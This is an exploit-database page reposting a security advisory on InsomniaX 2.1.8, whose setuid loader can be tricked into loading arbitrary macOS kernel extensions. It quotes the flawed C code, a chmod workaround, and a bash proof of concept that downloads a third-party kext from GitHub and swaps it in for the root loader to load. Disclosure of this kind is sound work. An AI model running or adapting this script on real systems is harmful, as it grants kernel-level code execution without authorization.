0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

InsomniaX 2.1.8 Arbitrary Kernel Extension Loading Vulnerability

Author

Yorick Koster

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

------------------------------------------------------------------------
InsomniaX loader allows loading of arbitrary Kernel Extensions
------------------------------------------------------------------------
Yorick Koster, April 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the loader application bundled with InsomniaX can be
used to load arbitrary Kernel Extensions (kext). The loader is normally
used to load a kext file that is needed to disable the Lid Sleep. A flaw
has been found in the loader that allows a local attacker to load (or
unload) any arbitrary kext file.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- http://semaja2.net/2017/06/insomniax-security-notice/
- http://semaja2.net/2017/06/thank-you-and-farewell-for-now/

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on InsomniaX version 2.1.8.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available. The author of InsomniaX reports
that InsomniaX is no longer supported. As a workaround, remove the
setuid bit from the loader file. Doing so will prevent users from
disabling the Lid Sleep.

sudo chmod u-s /Applications/InsomniaX.app/Contents/Resources/loader

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20170405/insomniax-loader-allows-loading-of-arbitrary-kernel-extensions.html

This issue exists because InsomniaX tries to load the kext file form the user's home folder. When started the loader first changes the owner of the kext file to user root and group wheel. This is required or else the kext loader will refuse to load the kext. After changing the owner, loader will call kextload with the path set to the kext located in the user's home directory. Replacing InsomniaX' kext with a different one will cause the loader to load this kext instead.

struct passwd *pw = getpwuid(getuid());
   
char *homedir = pw->pw_dir;

char *supportPath = strcat(homedir, "/Library/Application Support/InsomniaX");
const char *kextPath = strcat(supportPath, "/Insomnia_r11.kext");
   
switch(myCommand->authorizedCommandId)
{
   case kMyAuthorizedLoad: {
      /* Child code. */
      if(fork() == 0) {
#ifdef DEBUG
         fprintf(stderr, "CHOWN\n");
#endif
         dup2(2,1);
         execl("/usr/sbin/chown", "chown", "-R", "root:wheel", kextPath, NULL);
      }
      /* Parent code. */
      else {
         wait(&status);
         /* Child code. */
         if(fork() == 0) {
#ifdef DEBUG
            fprintf(stderr, "KEXTLOAD\n");
#endif
            dup2(2,1);
            execl("/sbin/kextload", "kextload", kextPath, NULL);
         }

This issue can be demonstrated using the following steps:

- start InsomniaX
- run the Bash script below
- click on the InsomniaX icon in the menu bar and select Disable Lid Sleep
- run kextstat -l -b com.google.MacPmem to check if the kext is loaded

#!/bin/bash
mv ~/Library/Application\ Support/InsomniaX ~/Library/Application\ Support/InsomniaX.O
mkdir -p ~/Library/Application\ Support/InsomniaX
cd ~/Library/Application\ Support/InsomniaX
curl -L https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip --output osxpmem-2.1.post4.zip
unzip osxpmem-2.1.post4.zip
mv osxpmem.app/MacPmem.kext/ Insomnia_r11.kext

#  0day.today [2024-11-14]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

InsomniaX 2.1.8 Arbitrary Kernel Extension Loading Vulnerability

Report Error

Report Error